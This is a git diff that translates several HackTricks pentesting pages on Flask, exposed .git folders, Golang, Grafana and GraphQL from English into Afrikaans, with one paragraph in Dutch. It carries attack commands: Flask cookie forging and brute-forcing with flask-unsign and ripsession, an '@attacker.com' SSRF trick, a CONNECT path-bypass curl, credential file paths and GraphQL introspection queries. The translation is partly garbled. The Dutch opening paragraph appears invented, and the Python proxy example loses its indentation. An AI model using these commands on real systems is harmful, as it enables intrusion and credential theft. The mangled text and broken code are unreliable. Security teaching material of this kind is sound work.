+Om deze techniek toe te passen, moet je eerst de versie van Flask identificeren die wordt gebruikt door de applicatie. Dit kan worden gedaan door de HTTP-responsheaders te controleren of door de broncode van de applicatie te analyseren.
+
+Zodra je de versie hebt geïdentificeerd, kun je de juiste exploit gebruiken om de handtekening te vervalsen. Dit kan worden gedaan door de zwakke punten in de handtekeningmethode van de verouderde Flask-versie te benutten.
+
+Het is belangrijk op te merken dat deze techniek alleen van toepassing is op oudere versies van Flask en mogelijk niet werkt op recentere versies. Het is altijd raadzaam om de nieuwste versie van Flask te gebruiken om mogelijke beveiligingslekken te voorkomen.
 ```bash
 flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
 ```
-
 ### **RIPsession**
 
-Command line tool to brute-force websites using cookies crafted with flask-unsign.
+Opdraglyninstrument om webwerwe te brute-force met behulp van koekies wat met flask-unsign saamgestel is.
 
 {% embed url="https://github.com/Tagvi/ripsession" %}
-
 ```bash
-  ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
+ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
 ```
+### SQLi in Flask-sessiekoekie met SQLmap
 
-### SQLi in Flask session cookie with SQLmap
+[**Hierdie voorbeeld**](../../pentesting-web/sql-injection/sqlmap/#eval) gebruik die sqlmap `eval` opsie om **outomaties sqlmap payloads te onderteken** vir Flask deur gebruik te maak van 'n bekende geheim.
 
-[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
-
-## Flask Proxy to SSRF
-
-[**In this writeup**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) it's explained how Flask allows a request starting with the charcter "@":
+## Flask Proxy na SSRF
 
+[**In hierdie uiteensetting**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) word verduidelik hoe Flask 'n versoek toelaat wat begin met die karakter "@":
 ```http
 GET @/ HTTP/1.1
 Host: target.com
 Connection: close
 ```
-
-Which in the following scenario:
-
+Watter een van die volgende scenario's:
 ```python
 from flask import Flask
 from requests import get
@@ -111,32 +141,31 @@ SITE_NAME = 'https://google.com/'
 @app.route('/', defaults={'path': ''})
 @app.route('/')
 def proxy(path):
-  return get(f'{SITE_NAME}{path}').content
+return get(f'{SITE_NAME}{path}').content
 
 app.run(host='0.0.0.0', port=8080)
 ```
-
-Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**.
+Kan toelaat om iets soos "@attacker.com" in te voer om 'n **SSRF** te veroorsaak.
 
 
 
 

 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
+Kry vandag toegang:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/git.md b/network-services-pentesting/pentesting-web/git.md
index 9b7944518..e60e35e7d 100644
--- a/network-services-pentesting/pentesting-web/git.md
+++ b/network-services-pentesting/pentesting-web/git.md
@@ -2,46 +2,46 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
-**To dump a .git folder from a URL use** [**https://github.com/arthaud/git-dumper**](https://github.com/arthaud/git-dumper)
+**Om 'n .git-vouer van 'n URL te dump, gebruik** [**https://github.com/arthaud/git-dumper**](https://github.com/arthaud/git-dumper)
 
-**Use** [**https://www.gitkraken.com/**](https://www.gitkraken.com/) **to inspect the content**
+**Gebruik** [**https://www.gitkraken.com/**](https://www.gitkraken.com/) **om die inhoud te ondersoek**
 
-If a _.git_ directory is found in a web application you can download all the content using _wget -r http://web.com/.git._ Then, you can see the changes made by using _git diff_.
+As 'n _.git_-gids gevind word in 'n webtoepassing, kan jy al die inhoud aflaai deur _wget -r http://web.com/.git_ te gebruik. Dan kan jy die veranderinge sien deur _git diff_ te gebruik.
 
-The tools: [Git-Money](https://github.com/dnoiz1/git-money), [DVCS-Pillage](https://github.com/evilpacket/DVCS-Pillage) and [GitTools](https://github.com/internetwache/GitTools) can be used to retrieve the content of a git directory.
+Die gereedskap: [Git-Money](https://github.com/dnoiz1/git-money), [DVCS-Pillage](https://github.com/evilpacket/DVCS-Pillage) en [GitTools](https://github.com/internetwache/GitTools) kan gebruik word om die inhoud van 'n git-gids te herwin.
 
-The tool [https://github.com/cve-search/git-vuln-finder](https://github.com/cve-search/git-vuln-finder) can be used to search for CVEs and security vulnerability messages inside commits messages.
+Die gereedskap [https://github.com/cve-search/git-vuln-finder](https://github.com/cve-search/git-vuln-finder) kan gebruik word om te soek na CVE's en sekuriteitskwesbaarheidsboodskappe binne in toewydingsboodskappe.
 
-The tool [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) search for sensitive data in the repositories of an organisations and its employees.
+Die gereedskap [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) soek na sensitiewe data in die opgaarplekke van 'n organisasie en sy werknemers.
 
-[Repo security scanner](https://github.com/UKHomeOffice/repo-security-scanner) is a command line-based tool that was written with a single goal: to help you discover GitHub secrets that developers accidentally made by pushing sensitive data. And like the others, it will help you find passwords, private keys, usernames, tokens and more.
+[Repo security scanner](https://github.com/UKHomeOffice/repo-security-scanner) is 'n opdraggelyngebaseerde gereedskap wat geskryf is met 'n enkele doel: om jou te help om GitHub-geheime te ontdek wat ontwikkelaars per ongeluk gemaak het deur sensitiewe data te stuur. En soos die ander, sal dit jou help om wagwoorde, private sleutels, gebruikersname, tokens en meer te vind.
 
-[TruffleHog](https://github.com/dxa4481/truffleHog) searches through GitHub repositories and digs through the commit history and branches, looking for accidentally committed secrets
+[TruffleHog](https://github.com/dxa4481/truffleHog) deursoek GitHub-opgaarplekke en deursoek die toewydingsgeskiedenis en takke, op soek na per ongeluk geplaasde geheime
 
-Here you can find an study about github dorks: [https://securitytrails.com/blog/github-dorks](https://securitytrails.com/blog/github-dorks)
+Hier kan jy 'n studie oor GitHub-dorks vind: [https://securitytrails.com/blog/github-dorks](https://securitytrails.com/blog/github-dorks)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/golang.md b/network-services-pentesting/pentesting-web/golang.md
index 32906d936..dad68f1db 100644
--- a/network-services-pentesting/pentesting-web/golang.md
+++ b/network-services-pentesting/pentesting-web/golang.md
@@ -1,52 +1,46 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 
-## CONNECT method
+## CONNECT-metode
 
-In the Go programming language, a common practice when handling HTTP requests, specifically using the `net/http` library, is the automatic conversion of the request path into a standardized format. This process involves:
+In die Go-programmeertaal is dit 'n algemene praktyk om HTTP-versoeke te hanteer, spesifiek met behulp van die `net/http`-biblioteek, om die versoekpad outomaties na 'n gestandaardiseerde formaat om te skakel. Hierdie proses behels:
 
-- Paths ending with a slash (`/`) like `/flag/` are redirected to their non-slash counterpart, `/flag`.
-- Paths containing directory traversal sequences such as `/../flag` are simplified and redirected to `/flag`.
-- Paths with a trailing period as in `/flag/.` are also redirected to the clean path `/flag`.
+- Paaie wat eindig met 'n skuinstrek (`/`) soos `/flag/` word omgelei na hul nie-skuinstrek eweknie, `/flag`.
+- Paaie wat gidsverspreidingsvolgordes bevat, soos `/../flag`, word vereenvoudig en omgelei na `/flag`.
+- Paaie met 'n punt aan die einde, soos `/flag/.`, word ook omgelei na die skoon pad `/flag`.
 
-However, an exception is observed with the use of the `CONNECT` method. Unlike other HTTP methods, `CONNECT` does not trigger the path normalization process. This behavior opens a potential avenue for accessing protected resources. By employing the `CONNECT` method alongside the `--path-as-is` option in `curl`, one can bypass the standard path normalization and potentially reach restricted areas.
-
-The following command demonstrates how to exploit this behavior:
+Daar is egter 'n uitsondering met die gebruik van die `CONNECT`-metode. Anders as ander HTTP-metodes, veroorsaak `CONNECT` nie die padnormaliseringsproses nie. Hierdie gedrag skep 'n potensiële geleentheid om toegang tot beskermde hulpbronne te verkry. Deur die gebruik van die `CONNECT`-metode saam met die `--path-as-is`-opsie in `curl`, kan 'n persoon die standaard padnormalisering omseil en moontlik beperkte areas bereik.
 
+Die volgende opdrag demonstreer hoe om van hierdie gedrag gebruik te maak:
 ```bash
 curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag
 ```
-
 [https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go\#L2354-L2364](https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364)
 
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/grafana.md b/network-services-pentesting/pentesting-web/grafana.md
index 367a7d769..827ffa091 100644
--- a/network-services-pentesting/pentesting-web/grafana.md
+++ b/network-services-pentesting/pentesting-web/grafana.md
@@ -2,38 +2,38 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
-## Interesting stuff
+## Interessante dinge
 
-* The file **`/etc/grafana/grafana.ini`** can contain sensitive information such as **admin** **username** and **password.**
-* Inside the platform you could **invite people** or **generate API keys** (might need to be admin)
-* You could check which plugins are installed (or even install new)
-* By default it uses **SQLite3** database in **`/var/lib/grafana/grafana.db`**
-  * `select user,password,database from data_source;`
+* Die lêer **`/etc/grafana/grafana.ini`** kan sensitiewe inligting bevat soos die **admin** **gebruikersnaam** en **wagwoord**.
+* Binne die platform kan jy **mense uitnooi** of **API-sleutels genereer** (moontlik as admin)
+* Jy kan nagaan watter plugins geïnstalleer is (of selfs nuwe installeer)
+* Standaard gebruik dit die **SQLite3**-databasis in **`/var/lib/grafana/grafana.db`**
+* `select user,password,database from data_source;`
 
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/graphql.md b/network-services-pentesting/pentesting-web/graphql.md
index a5f14f057..95a53722f 100644
--- a/network-services-pentesting/pentesting-web/graphql.md
+++ b/network-services-pentesting/pentesting-web/graphql.md
@@ -2,29 +2,29 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Introduction
+## Inleiding
 
-GraphQL is **highlighted** as an **efficient alternative** to REST API, offering a simplified approach for querying data from the backend. In contrast to REST, which often necessitates numerous requests across varied endpoints to gather data, GraphQL enables the fetching of all required information through a **single request**. This streamlining significantly **benefits developers** by diminishing the intricacy of their data fetching processes.
+GraphQL word **beklemtoon** as 'n **doeltreffende alternatief** vir REST API, wat 'n vereenvoudigde benadering bied vir die opvraag van data vanaf die agterkant. In teenstelling met REST, wat dikwels verskeie versoekings oor verskillende eindpunte vereis om data te versamel, maak GraphQL dit moontlik om alle benodigde inligting deur 'n **enkele versoek** te haal. Hierdie stroomlynproses bied aansienlike **voordele vir ontwikkelaars** deur die ingewikkeldheid van hul data-opvraagprosesse te verminder.
 
-## GraphQL and Security
+## GraphQL en Sekuriteit
 
-With the advent of new technologies, including GraphQL, new security vulnerabilities also emerge. A key point to note is that **GraphQL does not include authentication mechanisms by default**. It's the responsibility of developers to implement such security measures. Without proper authentication, GraphQL endpoints may expose sensitive information to unauthenticated users, posing a significant security risk.
+Met die opkoms van nuwe tegnologieë, insluitend GraphQL, ontstaan ook nuwe sekuriteitskwesbaarhede. 'n Belangrike punt om op te let is dat **GraphQL nie outomaties outentiseringsmeganismes insluit nie**. Dit is die verantwoordelikheid van ontwikkelaars om sulke sekuriteitsmaatreëls te implementeer. Sonder behoorlike outentisering kan GraphQL-eindpunte sensitiewe inligting aan ongeoutentiseerde gebruikers blootstel, wat 'n aansienlike sekuriteitsrisiko inhou.
 
-### Directory Brute Force Attacks and GraphQL
+### Gids vir Brute Force-aanvalle en GraphQL
 
-To identify exposed GraphQL instances, the inclusion of specific paths in directory brute force attacks is recommended. These paths are:
+Om blootgestelde GraphQL-instanties te identifiseer, word die insluiting van spesifieke paaie in brute force-aanvalle aanbeveel. Hierdie paaie is:
 
 - `/graphql`
 - `/graphiql`
@@ -35,33 +35,29 @@ To identify exposed GraphQL instances, the inclusion of specific paths in direct
 - `/graphql/api`
 - `/graphql/graphql`
 
-Identifying open GraphQL instances allows for the examination of supported queries. This is crucial for understanding the data accessible through the endpoint. GraphQL's introspection system facilitates this by detailing the queries a schema supports. For more information on this, refer to the GraphQL documentation on introspection: [**GraphQL: A query language for APIs.**](https://graphql.org/learn/introspection/)
+Die identifisering van oop GraphQL-instanties maak dit moontlik om ondersteunde navrae te ondersoek. Dit is noodsaaklik om die data wat toeganklik is deur die eindpunt te verstaan. GraphQL se introspeksiestelsel fasiliteer dit deur die navrae wat 'n skema ondersteun, in detail te beskryf. Vir meer inligting hieroor, verwys na die GraphQL-dokumentasie oor introspeksie: [**GraphQL: A query language for APIs.**](https://graphql.org/learn/introspection/)
 
-### Fingerprint
+### Vingerafdruk
 
-The tool [**graphw00f**](https://github.com/dolevf/graphw00f) is capable to detect wich GraphQL engine is used in a server and then prints some helpful information for the security auditor.
+Die instrument [**graphw00f**](https://github.com/dolevf/graphw00f) is in staat om te bepaal watter GraphQL-enjin in 'n bediener gebruik word en druk dan nuttige inligting vir die sekuriteitsouditeur af.
 
-#### Universal queries 
-
-To check if a URL is a GraphQL service, a **universal query**, `query{__typename}`, can be sent. If the response includes `{"data": {"__typename": "Query"}}`, it confirms the URL hosts a GraphQL endpoint. This method relies on GraphQL's `__typename` field, which reveals the type of the queried object.
+#### Universele navrae 
 
+Om te bepaal of 'n URL 'n GraphQL-diens is, kan 'n **universele navraag**, `query{__typename}`, gestuur word. As die respons `{"data": {"__typename": "Query"}}` insluit, bevestig dit dat die URL 'n GraphQL-eindpunt huisves. Hierdie metode maak gebruik van GraphQL se `__typename`-veld, wat die tipe van die ondervraagde objek onthul.
 ```javascript
 query{__typename}
 ```
+### Basiese Enumerasie
 
-### Basic Enumeration
+Graphql ondersteun gewoonlik **GET**, **POST** (x-www-form-urlencoded) en **POST**(json). Alhoewel dit vir sekuriteit aanbeveel word om slegs json toe te laat om CSRF-aanvalle te voorkom.
 
-Graphql usually supports **GET**, **POST** (x-www-form-urlencoded) and **POST**(json). Although for security it's recommended to only allow json to prevent CSRF attacks.
-
-#### Introspection
-
-To use introspection to discover schema information, query the `__schema` field. This field is available on the root type of all queries.
+#### Introspeksie
 
+Om introspeksie te gebruik om skemasinligting te ontdek, ondersoek die `__schema` veld. Hierdie veld is beskikbaar op die wortel tipe van alle navrae.
 ```bash
 query={__schema{types{name,fields{name}}}}
 ```
-
-With this query you will find the name of all the types being used:
+Met hierdie navraag sal jy die naam van al die tipes wat gebruik word, vind:
 
 ![](<../../.gitbook/assets/image (202).png>)
 
@@ -71,460 +67,424 @@ query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofTy
 ```
 {% endcode %}
 
-With this query you can extract all the types, it's fields, and it's arguments (and the type of the args). This will be very useful to know how to query the database.
+Met hierdie navraag kan jy al die tipes, hul velde en hul argumente (en die tipe van die argumente) onttrek. Dit sal baie nuttig wees om te weet hoe om die databasis te ondervra.
 
 ![](<../../.gitbook/assets/image (207) (3).png>)
 
-**Errors**
-
